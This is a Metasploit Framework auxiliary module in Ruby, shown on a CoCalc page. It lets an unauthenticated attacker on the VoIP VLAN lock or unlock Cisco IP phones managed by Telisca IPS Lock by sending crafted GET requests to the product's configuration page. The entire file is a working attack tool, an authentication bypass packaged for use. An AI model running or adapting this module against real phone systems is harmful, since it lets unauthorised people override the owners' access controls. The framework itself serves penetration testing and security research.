Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/voip/telisca_ips_lock_control.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Telisca IPS Lock Cisco IP Phone Control',

14
        'Description' => %q{

15
          This module allows an unauthenticated attacker to exercise the

16
          "Lock" and "Unlock" functionality of Telisca IPS Lock for Cisco IP

17
          Phones. This module should be run in the VoIP VLAN, and requires

18
          knowledge of the target phone's name (for example, SEP002497AB1D4B).

19


20
          Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.

21
        },

22
        'References' => [

23
          # Publicly disclosed via Metasploit PR

24
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/6470'],

25
        ],

26
        'Author' => [

27
          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',

28
          'zirsalem'

29
        ],

30
        'License' => MSF_LICENSE,

31
        'DisclosureDate' => '2015-12-17',

32
        'Actions' => [

33
          ['LOCK', { 'Description' => 'To lock a phone' }],

34
          ['UNLOCK', { 'Description' => 'To unlock a phone' }]

35
        ],

36
        'DefaultAction' => 'UNLOCK',

37
        'Notes' => {

38
          'Stability' => [CRASH_SAFE],

39
          'SideEffects' => [IOC_IN_LOGS],

40
          'Reliability' => []

41
        }

42
      )

43
    )

44


45
    register_options(

46
      [

47
        OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']),

48
        OptString.new('PHONENAME', [true, 'The name of the target phone'])

49
      ]

50
    )

51
  end

52


53
  def print_status(msg = '')

54
    super("#{peer} - #{msg}")

55
  end

56


57
  def print_good(msg = '')

58
    super("#{peer} - #{msg}")

59
  end

60


61
  def print_error(msg = '')

62
    super("#{peer} - #{msg}")

63
  end

64


65
  # Returns the status of the listening port.

66
  #

67
  # @return [Boolean] TrueClass if port open, otherwise FalseClass.

68
  def port_open?

69
    res = send_request_raw({ 'method' => 'GET', 'uri' => '/' })

70
    res ? true : false

71
  rescue ::Rex::ConnectionRefused

72
    vprint_status('Connection refused')

73
    return false

74
  rescue ::Rex::ConnectionError

75
    vprint_error('Connection failed')

76
    return false

77
  rescue ::OpenSSL::SSL::SSLError

78
    vprint_error('SSL/TLS connection error')

79
    return false

80
  end

81


82
  # Locks a device.

83
  #

84
  # @param phone_name [String] Name of the phone used for the pn parameter.

85
  #

86
  # @return [void]

87
  def lock(phone_name)

88
    res = send_request_cgi({

89
      'method' => 'GET',

90
      'uri' => '/IPSPCFG/user/Default.aspx',

91
      'headers' => {

92
        'Connection' => 'keep-alive',

93
        'Accept-Language' => 'en-US,en;q=0.5'

94
      },

95
      'vars_get' => {

96
        'action' => 'DO',

97
        'tg' => 'L',

98
        'pn' => phone_name,

99
        'dp' => '',

100
        'gr' => '',

101
        'gl' => ''

102
      }

103
    })

104


105
    unless res

106
      print_error('The connection timed out while trying to unlock')

107
      return

108
    end

109


110
    unless res.code == 200

111
      print_error("Unexpected response #{res.code}")

112
      return

113
    end

114


115
    if res.body.include?('Unlock') || res.body.include?('U7LCK')

116
      print_good("The device #{phone_name} is already locked")

117
    elsif res.body.include?('unlocked') || res.body.include?('Locking') || res.body.include?('QUIT')

118
      print_good("Device #{phone_name} successfully locked")

119
    else

120
      print_error('Unexpected reply')

121
    end

122
  end

123


124
  # Unlocks a phone.

125
  #

126
  # @param phone_name [String] Name of the phone used for the pn parameter.

127
  #

128
  # @return [void]

129
  def unlock(phone_name)

130
    res = send_request_cgi({

131
      'method' => 'GET',

132
      'uri' => '/IPSPCFG/user/Default.aspx',

133
      'headers' => {

134
        'Connection' => 'keep-alive',

135
        'Accept-Language' => 'en-US,en;q=0.5'

136
      },

137
      'vars_get' => {

138
        'action' => 'U7LCK',

139
        'pn' => phone_name,

140
        'dp' => ''

141
      }

142
    })

143


144
    unless res

145
      print_error('The connection timed out while trying to unlock')

146
      return

147
    end

148


149
    unless res.code == 200

150
      print_error("Unexpected response #{res.code}")

151
      return

152
    end

153


154
    if res.body.include?('Unlock') || res.body.include?('U7LCK')

155
      print_good("The device #{phone_name} is already locked")

156
    elsif res.body.include?('unlocked') || res.body.include?('QUIT')

157
      print_good("The device #{phone_name} successfully unlocked")

158
    else

159
      print_error('Unexpected reply')

160
    end

161
  end

162


163
  def run

164
    unless port_open?

165
      print_error('The web server is unreachable!')

166
      return

167
    end

168


169
    phone_name = datastore['PHONENAME']

170
    case action.name

171
    when 'LOCK'

172
      lock(phone_name)

173
    when 'UNLOCK'

174
      unlock(phone_name)

175
    end

176
  end

177
end

178


179